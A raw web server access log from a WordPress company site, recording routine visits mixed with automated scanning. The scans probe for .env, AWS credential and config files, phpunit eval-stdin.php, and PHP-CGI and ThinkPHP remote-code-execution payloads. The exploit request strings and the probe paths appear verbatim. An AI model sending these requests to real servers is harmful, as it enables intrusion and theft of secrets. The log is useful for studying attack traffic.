185.177.72.36 - - [23/Aug/2025:05:25:29 +0800] "GET /site/.env HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:30 +0800] "GET /xampp/.env HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:31 +0800] "GET /main/.env HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:32 +0800] "GET /node_modules/.env HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:33 +0800] "GET /kyc/.env HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:34 +0800] "GET /admin/.env HTTP/1.1" 404 8991 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:35 +0800] "GET /prod/.env HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:35 +0800] "GET /.env.bak HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:36 +0800] "GET /api/shared/config/config.env HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:37 +0800] "GET /api/shared/config.env HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:38 +0800] "GET /config.env HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:39 +0800] "GET /website/.env HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:40 +0800] "GET /development/.env HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:41 +0800] "GET /backend/.env HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:42 +0800] "GET /api/shared/config/.env HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:42 +0800] "GET /api/shared/.env HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:43 +0800] "GET /api/config.env HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:44 +0800] "GET /service/email_service.py HTTP/1.1" 404 8991 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:45 +0800] "GET /node/.env_example HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
36.133.115.36 - - [23/Aug/2025:05:25:46 +0800] "POST /wp-cron.php?doing_wp_cron=1755897946.3240370750427246093750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
185.177.72.36 - - [23/Aug/2025:05:25:46 +0800] "GET /.env.production.local HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:47 +0800] "GET /.env.local HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:48 +0800] "GET /.env.example HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:49 +0800] "GET /.env.stage HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:50 +0800] "GET /.env.old HTTP/1.1" 404 8988 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:51 +0800] "GET /.env_sample HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:52 +0800] "GET /.env.prod HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:53 +0800] "GET /crm/.env HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:53 +0800] "GET /local/.env HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:54 +0800] "GET /core/.env HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:55 +0800] "GET /apps/.env HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:56 +0800] "GET /application/.env HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:57 +0800] "GET /web/.env HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:58 +0800] "GET /.aws/credentials HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:59 +0800] "GET /wp-config.php.bak HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:59 +0800] "GET /info.php HTTP/1.1" 200 49 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:25:59 +0800] "GET /dashboard/phpinfo.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:26:00 +0800] "GET /admin/server_info.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:26:00 +0800] "GET /server_info.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:26:01 +0800] "GET /app_dev.php/_profiler/phpinfo HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:26:01 +0800] "GET /test.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:26:02 +0800] "GET /server-info HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:26:03 +0800] "GET /server-info.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:26:03 +0800] "GET /secured/phpinfo.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:26:04 +0800] "GET /appsettings.json HTTP/1.1" 404 8991 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:26:05 +0800] "GET /config/aws.yml HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:26:06 +0800] "GET /settings.py HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:26:07 +0800] "GET /config.json HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:26:08 +0800] "GET /application.properties HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
185.177.72.36 - - [23/Aug/2025:05:26:10 +0800] "GET /?phpinfo=1 HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
36.133.115.36 - - [23/Aug/2025:05:48:46 +0800] "POST /wp-cron.php?doing_wp_cron=1755899326.1162769794464111328125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
91.224.92.17 - - [23/Aug/2025:05:49:05 +0800] "GET / HTTP/1.1" 200 109837 "-" "-"
36.133.115.36 - - [23/Aug/2025:05:54:46 +0800] "POST /wp-cron.php?doing_wp_cron=1755899686.4060680866241455078125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
205.169.39.58 - - [23/Aug/2025:05:54:46 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.58 - - [23/Aug/2025:05:54:47 +0800] "GET / HTTP/1.1" 200 39302 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.58 - - [23/Aug/2025:05:54:48 +0800] "GET /wp-content/uploads/2025/07/1751425283-qizhou.kf_.qq_.com_.webp HTTP/1.1" 200 16864 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.58 - - [23/Aug/2025:05:54:50 +0800] "GET /wp-content/uploads/2025/07/1750174127-Marketing1920x800_3.webp HTTP/1.1" 200 52790 "http://cqqizhou.com/wp-content/uploads/elementor/css/post-1666.css?ver=1755834647" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.58 - - [23/Aug/2025:05:54:50 +0800] "GET /wp-content/uploads/2025/07/1753456723-%E5%8F%8C%E7%9B%B8%E9%92%A2roduct_Single600.webp HTTP/1.1" 200 22790 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.58 - - [23/Aug/2025:05:54:50 +0800] "GET /wp-content/uploads/2025/07/1753453096-%E5%8F%8C%E7%9B%B8%E9%92%A2product_Single600%C3%97284.webp HTTP/1.1" 200 14562 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.58 - - [23/Aug/2025:05:54:50 +0800] "GET /wp-content/uploads/2025/07/1753453127-%E4%BD%99%E5%8D%B7product_Single600%C3%97284.webp HTTP/1.1" 200 18744 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.58 - - [23/Aug/2025:05:54:50 +0800] "GET /wp-content/uploads/2025/07/1753456770-%E7%83%AD%E9%95%80%E9%94%8C%E5%8D%B7product_Single600.webp HTTP/1.1" 200 27502 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.58 - - [23/Aug/2025:05:54:51 +0800] "GET /wp-content/uploads/revslider/slider-1/1750929639-yuanjing_Slider_3840%C3%972160_20250626171955-scaled.webp HTTP/1.1" 200 203290 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.58 - - [23/Aug/2025:05:54:52 +0800] "GET /wp-content/uploads/2025/07/1753587901-Slider_3840%C3%972160_20250727-scaled-50x100.webp HTTP/1.1" 200 1660 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.58 - - [23/Aug/2025:05:54:52 +0800] "GET /wp-content/uploads/revslider/slider-1/1750861156-logistics_Slider_3840%C3%972160_20250625191356-scaled-50x100.webp HTTP/1.1" 200 1416 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.58 - - [23/Aug/2025:05:54:52 +0800] "GET /wp-content/uploads/revslider/slider-1/1750861156-logistics_Slider_3840%C3%972160_20250625191356-scaled-50x100.webp HTTP/1.1" 200 1416 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.58 - - [23/Aug/2025:05:54:52 +0800] "GET /wp-content/uploads/2025/07/1753587901-Slider_3840%C3%972160_20250727-scaled-50x100.webp HTTP/1.1" 200 1660 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.58 - - [23/Aug/2025:05:54:53 +0800] "GET /wp-json/sliderrevolution/sliders/1?srengine=7&slideid=2 HTTP/1.1" 200 2058 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.58 - - [23/Aug/2025:05:54:53 +0800] "GET /wp-json/sliderrevolution/sliders/1?srengine=7&slideid=3 HTTP/1.1" 200 2292 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.58 - - [23/Aug/2025:05:54:53 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 95 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.58 - - [23/Aug/2025:05:54:53 +0800] "GET /wp-content/uploads/2025/07/1753587901-Slider_3840%C3%972160_20250727-scaled.webp HTTP/1.1" 200 141034 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
205.169.39.58 - - [23/Aug/2025:05:54:54 +0800] "GET /wp-content/uploads/revslider/slider-1/1750861156-logistics_Slider_3840%C3%972160_20250625191356-scaled.webp HTTP/1.1" 200 197360 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
36.133.115.36 - - [23/Aug/2025:06:01:27 +0800] "POST /wp-cron.php?doing_wp_cron=1755900087.2077069282531738281250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
181.177.223.27 - - [23/Aug/2025:06:01:27 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [23/Aug/2025:06:03:53 +0800] "POST /wp-cron.php?doing_wp_cron=1755900233.6619989871978759765625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
91.224.92.14 - - [23/Aug/2025:06:03:53 +0800] "GET / HTTP/1.1" 200 33394 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [23/Aug/2025:06:13:26 +0800] "POST /wp-cron.php?doing_wp_cron=1755900806.3916079998016357421875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
118.34.229.64 - - [23/Aug/2025:06:13:26 +0800] "GET / HTTP/1.0" 301 0 "-" "-"
36.133.115.36 - - [23/Aug/2025:06:17:17 +0800] "POST /wp-cron.php?doing_wp_cron=1755901037.4918930530548095703125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [23/Aug/2025:06:17:17 +0800] "GET / HTTP/1.1" 200 33394 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [23/Aug/2025:06:29:05 +0800] "POST /wp-cron.php?doing_wp_cron=1755901745.1108109951019287109375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
91.224.92.17 - - [23/Aug/2025:06:29:24 +0800] "GET / HTTP/1.1" 200 96805 "-" "-"
36.133.115.36 - - [23/Aug/2025:06:43:04 +0800] "POST /wp-cron.php?doing_wp_cron=1755902584.4384191036224365234375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
92.55.190.215 - - [23/Aug/2025:06:43:04 +0800] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 31381 "-" "libredtail-http"
92.55.190.215 - - [23/Aug/2025:06:43:06 +0800] "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 151669 "-" "libredtail-http"
92.55.190.215 - - [23/Aug/2025:06:43:08 +0800] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
92.55.190.215 - - [23/Aug/2025:06:43:08 +0800] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
92.55.190.215 - - [23/Aug/2025:06:43:09 +0800] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
92.55.190.215 - - [23/Aug/2025:06:43:09 +0800] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
92.55.190.215 - - [23/Aug/2025:06:43:10 +0800] "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
92.55.190.215 - - [23/Aug/2025:06:43:10 +0800] "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
92.55.190.215 - - [23/Aug/2025:06:43:11 +0800] "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
92.55.190.215 - - [23/Aug/2025:06:43:12 +0800] "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
92.55.190.215 - - [23/Aug/2025:06:43:12 +0800] "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
92.55.190.215 - - [23/Aug/2025:06:43:13 +0800] "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
92.55.190.215 - - [23/Aug/2025:06:43:14 +0800] "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
92.55.190.215 - - [23/Aug/2025:06:43:14 +0800] "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
92.55.190.215 - - [23/Aug/2025:06:43:15 +0800] "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
92.55.190.215 - - [23/Aug/2025:06:43:15 +0800] "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
92.55.190.215 - - [23/Aug/2025:06:43:16 +0800] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
92.55.190.215 - - [23/Aug/2025:06:43:17 +0800] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
92.55.190.215 - - [23/Aug/2025:06:43:17 +0800] "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
92.55.190.215 - - [23/Aug/2025:06:43:18 +0800] "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
92.55.190.215 - - [23/Aug/2025:06:43:19 +0800] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
92.55.190.215 - - [23/Aug/2025:06:43:20 +0800] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
92.55.190.215 - - [23/Aug/2025:06:43:20 +0800] "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
92.55.190.215 - - [23/Aug/2025:06:43:21 +0800] "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
92.55.190.215 - - [23/Aug/2025:06:43:21 +0800] "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
92.55.190.215 - - [23/Aug/2025:06:43:22 +0800] "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
92.55.190.215 - - [23/Aug/2025:06:43:22 +0800] "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
92.55.190.215 - - [23/Aug/2025:06:43:23 +0800] "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
92.55.190.215 - - [23/Aug/2025:06:43:24 +0800] "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
92.55.190.215 - - [23/Aug/2025:06:43:24 +0800] "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
92.55.190.215 - - [23/Aug/2025:06:43:25 +0800] "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
92.55.190.215 - - [23/Aug/2025:06:43:26 +0800] "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
92.55.190.215 - - [23/Aug/2025:06:43:26 +0800] "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
92.55.190.215 - - [23/Aug/2025:06:43:27 +0800] "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
92.55.190.215 - - [23/Aug/2025:06:43:27 +0800] "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
92.55.190.215 - - [23/Aug/2025:06:43:28 +0800] "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
92.55.190.215 - - [23/Aug/2025:06:43:28 +0800] "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
92.55.190.215 - - [23/Aug/2025:06:43:29 +0800] "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
92.55.190.215 - - [23/Aug/2025:06:43:30 +0800] "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
92.55.190.215 - - [23/Aug/2025:06:43:31 +0800] "GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 200 64501 "-" "libredtail-http"
